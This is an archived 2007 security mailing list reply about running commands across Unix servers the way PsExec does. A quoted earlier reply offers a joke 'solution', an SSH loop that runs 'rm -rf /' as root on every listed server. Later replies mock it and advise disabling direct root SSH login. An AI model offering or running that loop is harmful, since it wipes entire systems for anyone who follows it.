Full Disclosure: Re: [Full-Disclosure] (Psexec on *NIX)

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Full Disclosure mailing list archives

Re: [Full-Disclosure] (Psexec on *NIX)

From: Xavier Beaudouin <kiwi () oav net>
Date: Thu, 1 Feb 2007 18:36:50 +0100


Le 1 févr. 07 à 17:48, Paul Schmehl a écrit :

--On Thursday, February 01, 2007 12:48:13 +0100 Knud Erik Højgaard  
<kokanin () gmail com> wrote:

something similar to PSExec under linux.


ssh-keygen
ssh-add
for i in `cat serverlist` ; do ssh root () $i rm -rf / ; done

For anyone who follows these instructions, let me know.  For a fee,  
I'll help you get back up and running.  :-)


In general on most unix box you have in /etc/ssh/sshd_config :

PermitRootLogin no

People who use root login with ssh are dangerous, sudo exist or can  
be installed...

Allowing direct root login even with SSH is IMHO stupid...

My 0,02c

/Xavier


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

By Date By Thread

Current thread:

[Full-Disclosure] (Psexec on *NIX) Gianluca Giacometti (Feb 01)
- Re: [Full-Disclosure] (Psexec on *NIX) Knud Erik Højgaard (Feb 01)
  - Re: [Full-Disclosure] (Psexec on *NIX) Paul Schmehl (Feb 01)
    - Re: [Full-Disclosure] (Psexec on *NIX) Xavier Beaudouin (Feb 01)
    - Re: [Full-Disclosure] (Psexec on *NIX) Eduardo Tongson (Feb 01)
    - Re: [Full-Disclosure] (Psexec on *NIX) Valdis . Kletnieks (Feb 01)
    - Re: [Full-Disclosure] (Psexec on *NIX) Raj Mathur (Feb 02)
    - Re: [Full-Disclosure] (Psexec on *NIX) Valdis . Kletnieks (Feb 02)
    - Re: [Full-Disclosure] (Psexec on *NIX) Q-Ball (Feb 04)